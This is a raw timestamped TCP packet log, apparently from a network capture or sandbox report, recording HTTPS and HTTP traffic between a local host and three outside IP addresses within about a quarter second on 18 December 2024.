                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.416317940 CET44349735150.171.28.10192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.416347027 CET44349735150.171.28.10192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.416393995 CET49735443192.168.2.6150.171.28.10
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.416407108 CET44349735150.171.28.10192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.416450024 CET49735443192.168.2.6150.171.28.10
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.418982029 CET4977680192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.428421974 CET44349734150.171.28.10192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.428472042 CET44349734150.171.28.10192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.428507090 CET49734443192.168.2.6150.171.28.10
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.428522110 CET44349734150.171.28.10192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.428555012 CET49734443192.168.2.6150.171.28.10
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.428569078 CET49734443192.168.2.6150.171.28.10
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.434318066 CET44349735150.171.28.10192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.434345961 CET44349735150.171.28.10192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.434386015 CET49735443192.168.2.6150.171.28.10
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.434393883 CET44349735150.171.28.10192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.434457064 CET49735443192.168.2.6150.171.28.10
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.440915108 CET44349734150.171.28.10192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.440963030 CET44349734150.171.28.10192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.441010952 CET49734443192.168.2.6150.171.28.10
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.441018105 CET44349734150.171.28.10192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.441076994 CET49734443192.168.2.6150.171.28.10
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.442962885 CET44349735150.171.28.10192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.442985058 CET44349735150.171.28.10192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.443053961 CET49735443192.168.2.6150.171.28.10
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.443063974 CET44349735150.171.28.10192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.443088055 CET49735443192.168.2.6150.171.28.10
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.443104982 CET49735443192.168.2.6150.171.28.10
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.448096037 CET44349734150.171.28.10192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.448142052 CET44349734150.171.28.10192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.448165894 CET49734443192.168.2.6150.171.28.10
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.448180914 CET44349734150.171.28.10192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.448209047 CET49734443192.168.2.6150.171.28.10
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.448230028 CET49734443192.168.2.6150.171.28.10
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.451546907 CET8049776139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.451553106 CET8049776139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.451627970 CET4977680192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.452995062 CET44349735150.171.28.10192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.453020096 CET44349735150.171.28.10192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.453073978 CET49735443192.168.2.6150.171.28.10
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.453092098 CET44349735150.171.28.10192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.453113079 CET49735443192.168.2.6150.171.28.10
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.453129053 CET49735443192.168.2.6150.171.28.10
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.454262018 CET8049776139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.454277992 CET8049776139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.454710007 CET4977680192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.457304001 CET44349734150.171.28.10192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.457369089 CET44349734150.171.28.10192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.457380056 CET49734443192.168.2.6150.171.28.10
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.457392931 CET44349734150.171.28.10192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.457418919 CET49734443192.168.2.6150.171.28.10
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.457439899 CET49734443192.168.2.6150.171.28.10
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.463088989 CET44349735150.171.28.10192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.463114023 CET44349735150.171.28.10192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.463160992 CET49735443192.168.2.6150.171.28.10
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.463176012 CET44349735150.171.28.10192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.463208914 CET49735443192.168.2.6150.171.28.10
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.463231087 CET49735443192.168.2.6150.171.28.10
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.465477943 CET44349734150.171.28.10192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.465549946 CET44349734150.171.28.10192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.465579987 CET49734443192.168.2.6150.171.28.10
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.465586901 CET44349734150.171.28.10192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.465612888 CET49734443192.168.2.6150.171.28.10
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.465639114 CET49734443192.168.2.6150.171.28.10
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.466511011 CET8049776139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.466550112 CET8049776139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.466556072 CET49791443192.168.2.6142.250.181.65
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.466603994 CET44349791142.250.181.65192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.466609955 CET4977680192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.466788054 CET49791443192.168.2.6142.250.181.65
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.468707085 CET8049776139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.468803883 CET49791443192.168.2.6142.250.181.65
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.468816996 CET44349791142.250.181.65192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.469470024 CET8049776139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.469575882 CET4977680192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.473052979 CET8049776139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.473066092 CET8049776139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.473123074 CET4977680192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.473851919 CET44349735150.171.28.10192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.473876953 CET44349735150.171.28.10192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.473943949 CET49735443192.168.2.6150.171.28.10
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.473953962 CET44349735150.171.28.10192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.473993063 CET49735443192.168.2.6150.171.28.10
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.476059914 CET44349734150.171.28.10192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.476114988 CET44349734150.171.28.10192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.476130962 CET49734443192.168.2.6150.171.28.10
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.476138115 CET44349734150.171.28.10192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.476177931 CET49734443192.168.2.6150.171.28.10
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.476636887 CET8049776139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.476689100 CET8049776139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.476763964 CET4977680192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.480531931 CET8049776139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.481154919 CET8049776139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.481209040 CET4977680192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.485182047 CET8049776139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.485218048 CET8049776139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.485268116 CET4977680192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.486044884 CET44349735150.171.28.10192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.486072063 CET44349735150.171.28.10192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.486134052 CET49735443192.168.2.6150.171.28.10
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.486145973 CET44349735150.171.28.10192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.486191034 CET49735443192.168.2.6150.171.28.10
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.486871958 CET44349734150.171.28.10192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.486921072 CET44349734150.171.28.10192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.486944914 CET49734443192.168.2.6150.171.28.10
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.486949921 CET44349734150.171.28.10192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.486979008 CET49734443192.168.2.6150.171.28.10
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.486994028 CET49734443192.168.2.6150.171.28.10
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.488220930 CET8049776139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.488854885 CET8049776139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.488945961 CET4977680192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.491719007 CET8049776139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.492389917 CET8049776139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.492450953 CET4977680192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.493155003 CET8049776139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.493923903 CET8049776139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.493961096 CET8049776139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.493978024 CET4977680192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.494523048 CET8049776139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.494559050 CET8049776139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.494577885 CET4977680192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.494595051 CET8049776139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.494646072 CET4977680192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.498156071 CET8049776139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.498212099 CET8049776139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.498297930 CET4977680192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.502342939 CET8049776139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.502963066 CET8049776139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.503026962 CET4977680192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.506154060 CET8049776139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.506372929 CET8049776139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.506424904 CET4977680192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.510526896 CET8049776139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.510564089 CET8049776139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.510665894 CET4977680192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.514579058 CET8049776139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.514681101 CET8049776139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.514734030 CET4977680192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.518573999 CET8049776139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.518791914 CET8049776139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.518841028 CET4977680192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.522839069 CET8049776139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.522917032 CET8049776139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.522967100 CET4977680192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.526966095 CET8049776139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.527095079 CET8049776139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.527146101 CET4977680192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.531260014 CET8049776139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.531301975 CET8049776139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.531409979 CET4977680192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.536346912 CET8049776139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.536364079 CET8049776139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.536410093 CET4977680192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.539254904 CET8049776139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.539402008 CET8049776139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.539561033 CET4977680192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.543365002 CET8049776139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.543628931 CET8049776139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.543679953 CET4977680192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.547548056 CET8049776139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.547864914 CET8049776139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.547919989 CET4977680192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.551728010 CET8049776139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.551907063 CET8049776139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.551956892 CET4977680192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.555908918 CET8049776139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.556199074 CET8049776139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.556313992 CET4977680192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.560153008 CET8049776139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.560270071 CET8049776139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.560326099 CET4977680192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.564692020 CET8049776139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.583374023 CET44349735150.171.28.10192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.583403111 CET44349735150.171.28.10192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.583472967 CET49735443192.168.2.6150.171.28.10
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.583502054 CET44349735150.171.28.10192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.583821058 CET49735443192.168.2.6150.171.28.10
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.597055912 CET44349734150.171.28.10192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.597115040 CET44349734150.171.28.10192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.597150087 CET49734443192.168.2.6150.171.28.10
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.597167015 CET44349734150.171.28.10192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.597201109 CET49734443192.168.2.6150.171.28.10
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.597222090 CET49734443192.168.2.6150.171.28.10
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.600605965 CET44349735150.171.28.10192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.600631952 CET44349735150.171.28.10192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.600687981 CET49735443192.168.2.6150.171.28.10
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.600699902 CET44349735150.171.28.10192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.600729942 CET49735443192.168.2.6150.171.28.10
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.600744009 CET49735443192.168.2.6150.171.28.10
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.606374979 CET4977680192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.608620882 CET49735443192.168.2.6150.171.28.10
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.612092018 CET44349734150.171.28.10192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.612142086 CET44349734150.171.28.10192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.612169027 CET49734443192.168.2.6150.171.28.10
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.612176895 CET44349734150.171.28.10192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.612225056 CET49734443192.168.2.6150.171.28.10
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.618927002 CET44349735150.171.28.10192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.618985891 CET44349735150.171.28.10192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.619009018 CET49735443192.168.2.6150.171.28.10
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.619024038 CET44349735150.171.28.10192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.619054079 CET49735443192.168.2.6150.171.28.10
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.619070053 CET49735443192.168.2.6150.171.28.10
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.621242046 CET49734443192.168.2.6150.171.28.10
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.623847008 CET44349734150.171.28.10192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.623904943 CET44349734150.171.28.10192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.623918056 CET49734443192.168.2.6150.171.28.10
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.623925924 CET44349734150.171.28.10192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.623965979 CET49734443192.168.2.6150.171.28.10
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.624125004 CET49734443192.168.2.6150.171.28.10
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.626558065 CET44349735150.171.28.10192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.626600981 CET44349735150.171.28.10192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.626650095 CET49735443192.168.2.6150.171.28.10
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.626663923 CET44349735150.171.28.10192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.626699924 CET49735443192.168.2.6150.171.28.10
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.631617069 CET44349734150.171.28.10192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.631665945 CET44349734150.171.28.10192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.631694078 CET49734443192.168.2.6150.171.28.10
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.631712914 CET44349734150.171.28.10192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.631733894 CET49734443192.168.2.6150.171.28.10
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.631752014 CET49734443192.168.2.6150.171.28.10
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.635245085 CET44349735150.171.28.10192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.635292053 CET44349735150.171.28.10192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.635335922 CET49735443192.168.2.6150.171.28.10
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.635355949 CET44349735150.171.28.10192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.635374069 CET49735443192.168.2.6150.171.28.10
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.635387897 CET49735443192.168.2.6150.171.28.10
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.639116049 CET44349734150.171.28.10192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.639142036 CET44349734150.171.28.10192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.639179945 CET49734443192.168.2.6150.171.28.10
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.639194012 CET44349734150.171.28.10192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.639220953 CET49734443192.168.2.6150.171.28.10
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.639235973 CET49734443192.168.2.6150.171.28.10
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.640944004 CET8049776139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.640959024 CET8049776139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.641011000 CET4977680192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.642903090 CET8049776139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.642915964 CET8049776139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.642975092 CET4977680192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.644110918 CET44349735150.171.28.10192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.644155025 CET44349735150.171.28.10192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.644166946 CET49735443192.168.2.6150.171.28.10
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.644184113 CET44349735150.171.28.10192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.644201994 CET49735443192.168.2.6150.171.28.10
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.644217968 CET49735443192.168.2.6150.171.28.10
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.648605108 CET8049776139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.648618937 CET8049776139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.648677111 CET4977680192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.648725033 CET44349734150.171.28.10192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.648746014 CET44349734150.171.28.10192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.648778915 CET49734443192.168.2.6150.171.28.10
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.648791075 CET44349734150.171.28.10192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.648811102 CET49734443192.168.2.6150.171.28.10
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.648827076 CET49734443192.168.2.6150.171.28.10
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.652013063 CET44349735150.171.28.10192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.652029037 CET44349735150.171.28.10192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.652081966 CET49735443192.168.2.6150.171.28.10
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.652110100 CET44349735150.171.28.10192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.652127981 CET49735443192.168.2.6150.171.28.10
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.652190924 CET49735443192.168.2.6150.171.28.10
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.655432940 CET44349734150.171.28.10192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.655457020 CET44349734150.171.28.10192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.655519962 CET49734443192.168.2.6150.171.28.10
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.655544043 CET44349734150.171.28.10192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.655744076 CET49734443192.168.2.6150.171.28.10
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.661254883 CET44349735150.171.28.10192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.661271095 CET44349735150.171.28.10192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.661322117 CET49735443192.168.2.6150.171.28.10
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.661339045 CET44349735150.171.28.10192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.661360025 CET49735443192.168.2.6150.171.28.10
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.661381960 CET49735443192.168.2.6150.171.28.10
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.663099051 CET44349734150.171.28.10192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.663121939 CET44349734150.171.28.10192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.663167953 CET49734443192.168.2.6150.171.28.10
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.663191080 CET44349734150.171.28.10192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.663211107 CET49734443192.168.2.6150.171.28.10
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.663228989 CET49734443192.168.2.6150.171.28.10
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.667020082 CET8049776139.99.188.124192.168.2.6
